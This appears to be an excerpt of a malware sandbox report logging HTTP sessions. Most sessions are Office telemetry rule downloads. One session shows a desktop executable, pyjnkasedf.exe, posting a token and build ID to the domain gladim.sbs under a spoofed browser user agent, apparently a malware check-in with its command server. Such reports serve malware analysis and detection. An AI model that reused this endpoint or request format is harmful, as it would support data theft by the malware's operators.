                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                      2024-11-30 21:38:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:34 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      70192.168.2.104979213.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:34 UTC192OUTGET /rules/rule120655v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:34 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:37 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7F164C3"
                                                                                                                                                                                                                                                      x-ms-request-id: dd02da03-701e-001e-0d91-3ff5e6000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213834Z-174f78459684bddphC1EWRbht400000011v0000000000n1k
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:34 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 49 69 5d 5b 4d 6d 5d 5b 42 62 5d 5b 4f 6f 5d 5b 58 78 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120655" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120653" /> <SR T="2" R="([Nn][Ii][Mm][Bb][Oo][Xx][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      71192.168.2.104979394.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:34 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----DAEBKKKEHDHDGDGCFBKJ
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 493
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:34 UTC493OUTData Raw: 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 44 41 45 42 4b 4b 4b 45 48 44 48 44 47 44 47 43 46 42 4b 4a 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------DAEBKKKEHDHDGDGCFBKJContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------DAEBKKKEHDHDGDGCFBKJCont
                                                                                                                                                                                                                                                      2024-11-30 21:38:35 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:35 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:35 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      72192.168.2.104979413.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:34 UTC192OUTGET /rules/rule120656v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:34 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:34 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:04 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BA48B5BDD"
                                                                                                                                                                                                                                                      x-ms-request-id: c5359d4f-401e-0035-67ab-4282d8000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213834Z-174f7845968zgtf6hC1EWRqd8s0000000uz00000000089b3
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:34 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120656" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      73192.168.2.104979513.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:34 UTC192OUTGET /rules/rule120657v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:34 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:57 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9FF95F80"
                                                                                                                                                                                                                                                      x-ms-request-id: bf7ba01b-c01e-007a-6b4e-41b877000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213834Z-174f7845968frfdmhC1EWRxxbw00000011zg00000000ey4r
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:35 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4e 6e 5d 5b 55 75 5d 5b 54 74 5d 5b 41 61 5d 5b 4e 6e 5d 5b 49 69 5d 5b 58 78 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120657" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120655" /> <SR T="2" R="([Nn][Uu][Tt][Aa][Nn][Ii][Xx])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      74192.168.2.104979613.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:35 UTC192OUTGET /rules/rule120658v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:35 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:34 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB650C2EC"
                                                                                                                                                                                                                                                      x-ms-request-id: fcd7fe31-301e-0033-0c91-3ffa9c000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213835Z-174f7845968swgbqhC1EWRmnb4000000123000000000g162
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:35 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120658" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      75192.168.2.104979713.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:35 UTC192OUTGET /rules/rule120659v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:35 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:35 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB3EAF226"
                                                                                                                                                                                                                                                      x-ms-request-id: f890ddb3-001e-00a2-63f9-41d4d5000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213835Z-174f7845968psccphC1EWRuz9s000000127g00000000axbq
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:35 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      76192.168.2.104979813.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:36 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:36 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:36 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 485
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB9769355"
                                                                                                                                                                                                                                                      x-ms-request-id: dce0685f-701e-001e-3f83-3ff5e6000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213836Z-174f7845968pf68xhC1EWRr4h8000000126000000000edsk
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:36 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      77192.168.2.104979913.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:36 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:37 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 411
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B989AF051"
                                                                                                                                                                                                                                                      x-ms-request-id: 02827f85-001e-00ad-7091-3f554b000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213837Z-174f7845968glpgnhC1EWR7uec00000012700000000040sy
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:37 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      78192.168.2.104980013.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:36 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:37 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:37 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 470
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BBB181F65"
                                                                                                                                                                                                                                                      x-ms-request-id: 1401d51e-801e-0067-0fb2-42fe30000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213837Z-174f7845968px8v7hC1EWR08ng00000012ag0000000036e0
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
